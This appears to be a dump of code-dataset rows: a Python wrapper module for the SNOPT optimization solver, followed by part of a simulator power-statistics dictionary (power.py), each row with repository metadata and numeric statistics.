| 34.6 | 57 | 0.843931 | 30 | 173 | 4.766667 | 0.433333 | 0.335664 | 0.41958 | 0.531469 | 0.524476 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.104046 | 173 | 4 | 58 | 43.25 | 0.922581 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
447bdfa1588e693079ed4c2a79721ffbd6f65096 | 8,334 | py | Python | lib/solver_interface/pyoptsolver/src/snopt-interface/pyscript/snoptWrapper.py | paperstiger/trajOptLib | 5e86a33537d89c0d1e35df7a436f9266fe817c49 | [
"MIT"
] | 6 | 2020-04-29T05:02:30.000Z | 2021-04-19T15:42:35.000Z | lib/solver_interface/pyoptsolver/src/snopt-interface/pyscript/snoptWrapper.py | paperstiger/trajOptLib | 5e86a33537d89c0d1e35df7a436f9266fe817c49 | [
"MIT"
] | null | null | null | lib/solver_interface/pyoptsolver/src/snopt-interface/pyscript/snoptWrapper.py | paperstiger/trajOptLib | 5e86a33537d89c0d1e35df7a436f9266fe817c49 | [
"MIT"
] | null | null | null | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2018 Gao Tang <gt70@duke.edu>
#
# Distributed under terms of the MIT license.
"""
snoptWrapper.py
Wrapper functions for calling snopt
"""
import numpy as np
import libpysnopt as libsnopt
def parseResult(rst):
"""Parse the results returned by snopt and convert to a dict."""
return {'flag': rst.flag, 'obj': rst.obj, 'x': rst.sol, 'f': rst.fval}
def directSolve(fun, x0, nf=None, xlb=None, xub=None, clb=None, cub=None, cfg=None):
"""Directly solve the optimization problem described using fun with guess x0
:param fun: A function like y = f(x) where x, y are np.ndarray
:param x0: np.ndarray (nx,) the initial guess to the solver
:param nf: int, length of y
:param xlb: np.ndarray (nx,) lower bound on decision variable x
:param xub: np.ndarray (nx,) upper bound on decision variable x
:param clb: np.ndarray (nc,) lower bound on return function c
:param cub: np.ndarray (nc,) upper bound on return function c
:param cfg: libsnopt.SnoptConfig, configuration of snopt solver
:returns: a dictionary containing the solution
"""
nx = len(x0)
if nf is None:
if clb is not None and cub is not None:
assert len(clb) == len(cub)
nf = len(clb)
else:
y = fun(x0)
nf = len(y)
if xlb is None or xub is None:
xlb = np.empty(0)
xub = np.empty(0)
if clb is None or cub is None:
clb = np.empty(0)
cub = np.empty(0)
if cfg is None:
cfg = libsnopt.SnoptConfig()
rst = libsnopt.directSolve(fun, x0, nx, nf, xlb, xub, clb, cub, cfg)
return parseResult(rst)
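# Illustrative usage sketch (an editorial addition, not part of the original
# module): it shows how directSolve above might be called on a toy problem.
# It assumes libpysnopt is built and importable and that y[0] carries the
# objective value, as in SNOPT's F-formulation; the names _example_direct_solve,
# toy_fun and guess are hypothetical.
def _example_direct_solve():
    """Minimize (x0 - 1)^2 + (x1 - 2)^2 subject only to box bounds on x."""
    def toy_fun(x):
        # A single row: y[0] is the objective, with no extra constraint rows.
        return np.array([(x[0] - 1.0) ** 2 + (x[1] - 2.0) ** 2])
    guess = np.zeros(2)
    xlb = np.full(2, -5.0)
    xub = np.full(2, 5.0)
    rst = directSolve(toy_fun, guess, nf=1, xlb=xlb, xub=xub)
    return rst  # a dict with keys 'flag', 'obj', 'x' and 'f'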
def inDirectSolve(fun, x0, nf=None, xlb=None, xub=None, clb=None, cub=None, cfg=None):
"""Directly solve the optimization problem described using fun with guess x0
:param fun: A function like f(x, y) where x, y are np.ndarray
:param x0: np.ndarray (nx,) the initial guess to the solver
:param nf: int, length of y
:param xlb: np.ndarray (nx,) lower bound on decision variable x
:param xub: np.ndarray (nx,) upper bound on decision variable x
:param clb: np.ndarray (nc,) lower bound on return function c
:param cub: np.ndarray (nc,) upper bound on return function c
:param cfg: libsnopt.SnoptConfig, configuration of snopt solver
:returns: a dictionary containing the solution
"""
nx = len(x0)
if nf is None:
if clb is not None and cub is not None:
assert len(clb) == len(cub)
nf = len(clb)
assert nf is not None
if xlb is None or xub is None:
xlb = np.empty(0)
xub = np.empty(0)
if clb is None or cub is None:
clb = np.empty(0)
cub = np.empty(0)
if cfg is None:
cfg = libsnopt.SnoptConfig()
rst = libsnopt.inDirectSolve(fun, x0, nx, nf, xlb, xub, clb, cub, cfg)
return parseResult(rst)
def gradSolve(fun, x0, nf=None, xlb=None, xub=None, clb=None, cub=None, cfg=None):
"""Directly solve the optimization problem described using fun with guess x0
:param fun: A function like y, J = f(x) where x, y, J are np.ndarray
:param x0: np.ndarray (nx,) the initial guess to the solver
:param nf: int, length of y
:param xlb: np.ndarray (nx,) lower bound on decision variable x
:param xub: np.ndarray (nx,) upper bound on decision variable x
:param clb: np.ndarray (nc,) lower bound on return function c
:param cub: np.ndarray (nc,) upper bound on return function c
:param cfg: libsnopt.SnoptConfig, configuration of snopt solver
:returns: a dictionary containing the solution
"""
nx = len(x0)
if nf is None:
if clb is not None and cub is not None:
assert len(clb) == len(cub)
nf = len(clb)
else:
y = fun(x0)
nf = len(y)
if xlb is None or xub is None:
xlb = np.empty(0)
xub = np.empty(0)
if clb is None or cub is None:
clb = np.empty(0)
cub = np.empty(0)
if cfg is None:
cfg = libsnopt.SnoptConfig()
rst = libsnopt.gradSolve(fun, x0, nx, nf, xlb, xub, clb, cub, cfg)
return parseResult(rst)
def inGradSolve(fun, x0, nf=None, xlb=None, xub=None, clb=None, cub=None, cfg=None):
"""Directly solve the optimization problem described using fun with guess x0
:param fun: A function like f(x, y, J) where x, y, J are np.ndarray
:param x0: np.ndarray (nx,) the initial guess to the solver
:param nf: int, length of y
:param xlb: np.ndarray (nx,) lower bound on decision variable x
:param xub: np.ndarray (nx,) upper bound on decision variable x
:param clb: np.ndarray (nc,) lower bound on return function c
:param cub: np.ndarray (nc,) upper bound on return function c
:param cfg: libsnopt.SnoptConfig, configuration of snopt solver
:returns: a dictionary containing the solution
"""
nx = len(x0)
if nf is None:
if clb is not None and cub is not None:
assert len(clb) == len(cub)
nf = len(clb)
assert nf is not None
if xlb is None or xub is None:
xlb = np.empty(0)
xub = np.empty(0)
if clb is None or cub is None:
clb = np.empty(0)
cub = np.empty(0)
if cfg is None:
cfg = libsnopt.SnoptConfig()
rst = libsnopt.inGradSolve(fun, x0, nx, nf, xlb, xub, clb, cub, cfg)
return parseResult(rst)
def spGradSolve(fun, x0, nf=None, nG=None, xlb=None, xub=None, clb=None, cub=None, cfg=None):
"""Directly solve the optimization problem described using fun with guess x0
:param fun: A function like y, spJ = f(x) where x, y are np.ndarray, J is scipy.sparse.csc_matrix
:param nf: int, length of y
:param nG: int, nnz of spJ
:param x0: np.ndarray (nx,) the initial guess to the solver
:param xlb: np.ndarray (nx,) lower bound on decision variable x
:param xub: np.ndarray (nx,) upper bound on decision variable x
:param clb: np.ndarray (nc,) lower bound on return function c
:param cub: np.ndarray (nc,) upper bound on return function c
:param cfg: libsnopt.SnoptConfig, configuration of snopt solver
:returns: a dictionary containing the solution
"""
nx = len(x0)
if nf is None:
if clb is not None and cub is not None:
assert len(clb) == len(cub)
nf = len(clb)
else:
y, spJ = fun(x0)
nf = len(y)
nG = spJ.nnz
if nG is None:
y, spJ = fun(x0)
nG = spJ.nnz
assert nf is not None
assert nG is not None
if xlb is None or xub is None:
xlb = np.empty(0)
xub = np.empty(0)
if clb is None or cub is None:
clb = np.empty(0)
cub = np.empty(0)
if cfg is None:
cfg = libsnopt.SnoptConfig()
rst = libsnopt.spGradSolve(fun, x0, nx, nf, nG, xlb, xub, clb, cub, cfg)
return parseResult(rst)
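# Illustrative usage sketch (an editorial addition, not part of the original
# module): it shows the (y, sparse Jacobian) callback form that spGradSolve
# above expects. It assumes the first row of y/clb/cub is the objective, as in
# SNOPT's F-formulation, and that scipy is available; _example_sp_grad_solve
# and quad_fun are hypothetical names.
def _example_sp_grad_solve():
    """Minimize x0^2 + x1^2 subject to x0 + x1 = 1, supplying a sparse Jacobian."""
    from scipy.sparse import csc_matrix
    def quad_fun(x):
        y = np.array([x[0] ** 2 + x[1] ** 2,  # objective row
                      x[0] + x[1]])           # linear constraint row
        jac = csc_matrix(np.array([[2.0 * x[0], 2.0 * x[1]],
                                   [1.0, 1.0]]))
        return y, jac
    guess = np.array([0.5, 0.5])
    clb = np.array([-1.0e20, 1.0])  # objective row effectively unbounded
    cub = np.array([1.0e20, 1.0])   # constraint row pinned to 1
    rst = spGradSolve(quad_fun, guess, nf=2, nG=4, clb=clb, cub=cub)
    return rst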
def inSpGradSolve(fun, x0, nf=None, nG=None, xlb=None, xub=None, clb=None, cub=None, cfg=None):
"""Directly solve the optimization problem described using fun with guess x0
:param fun: A function like f(x, y, G, row, col, rec) where x, y are np.ndarray, J is scipy.sparse.csc_matrix
:param x0: np.ndarray (nx,) the initial guess to the solver
:param nf: int, number of f
:param nG: int number nonzero in Jacobian
:param xlb: np.ndarray (nx,) lower bound on decision variable x
:param xub: np.ndarray (nx,) upper bound on decision variable x
:param clb: np.ndarray (nc,) lower bound on return function c
:param cub: np.ndarray (nc,) upper bound on return function c
:param cfg: libsnopt.SnoptConfig, configuration of snopt solver
:returns: a dictionary containing the solution
"""
nx = len(x0)
if nf is None:
if clb is not None and cub is not None:
assert len(clb) == len(cub)
nf = len(clb)
assert nf is not None
assert nG is not None
if xlb is None or xub is None:
xlb = np.empty(0)
xub = np.empty(0)
if clb is None or cub is None:
clb = np.empty(0)
cub = np.empty(0)
if cfg is None:
cfg = libsnopt.SnoptConfig()
rst = libsnopt.inSpGradSolve(fun, x0, nx, nf, nG, xlb, xub, clb, cub, cfg)
return parseResult(rst)
| 36.393013 | 113 | 0.62707 | 1,344 | 8,334 | 3.887649 | 0.096726 | 0.042488 | 0.036746 | 0.052823 | 0.896268 | 0.89378 | 0.89378 | 0.890144 | 0.889378 | 0.888804 | 0 | 0.010886 | 0.272498 | 8,334 | 228 | 114 | 36.552632 | 0.850734 | 0.474202 | 0 | 0.857143 | 0 | 0 | 0.00221 | 0 | 0 | 0 | 0 | 0 | 0.10084 | 1 | 0.058824 | false | 0 | 0.016807 | 0 | 0.134454 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
44969c415e8c6eaa548ddf4a55ec09ee734afa10 | 135,036 | py | Python | files/runs_small/cores_8/barnes/power.py | ST4NSB/sniper-simulator-predictions | 1f0fe2a10fda55fceea053464ea202bfe2effafc | [
"MIT"
] | 1 | 2021-03-08T03:39:23.000Z | 2021-03-08T03:39:23.000Z | files/runs_small/cores_8/barnes/power.py | ST4NSB/sniper-simulator-predictions | 1f0fe2a10fda55fceea053464ea202bfe2effafc | [
"MIT"
] | null | null | null | files/runs_small/cores_8/barnes/power.py | ST4NSB/sniper-simulator-predictions | 1f0fe2a10fda55fceea053464ea202bfe2effafc | [
"MIT"
] | null | null | null | power = {'BUSES': {'Area': 3.70399,
'Bus/Area': 3.70399,
'Bus/Gate Leakage': 0.00993673,
'Bus/Peak Dynamic': 0.216542,
'Bus/Runtime Dynamic': 0.0281445,
'Bus/Subthreshold Leakage': 0.103619,
'Bus/Subthreshold Leakage with power gating': 0.0388573,
'Gate Leakage': 0.00993673,
'Peak Dynamic': 0.216542,
'Runtime Dynamic': 0.0281445,
'Subthreshold Leakage': 0.103619,
'Subthreshold Leakage with power gating': 0.0388573},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0723132,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.259487,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.391893,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.476432,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.321039,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.555923,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.36686,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.24382,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.257251,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.359953,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.07797,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0740369,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0116379,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.111174,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0860694,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.18521,
'Execution Unit/Register Files/Runtime Dynamic': 0.0977073,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.288452,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.726224,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 3.16362,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00168503,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00168503,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00147496,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000574968,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00123639,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00608142,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0158954,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0827408,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.26302,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.202846,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.281025,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.74087,
'Instruction Fetch Unit/Runtime Dynamic': 0.588588,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0322611,
'L2/Runtime Dynamic': 0.00680373,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.68097,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.65482,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.111417,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.111417,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 5.20925,
'Load Store Unit/Runtime Dynamic': 2.3157,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.274735,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.54947,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0975043,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0979881,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.327235,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0332409,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.6543,
'Memory Management Unit/Runtime Dynamic': 0.131229,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 24.2763,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.258297,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0195243,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.163068,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.44089,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 6.64684,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0791433,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.264851,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.427065,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.491905,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.352513,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.610425,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.402439,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.36538,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.282968,
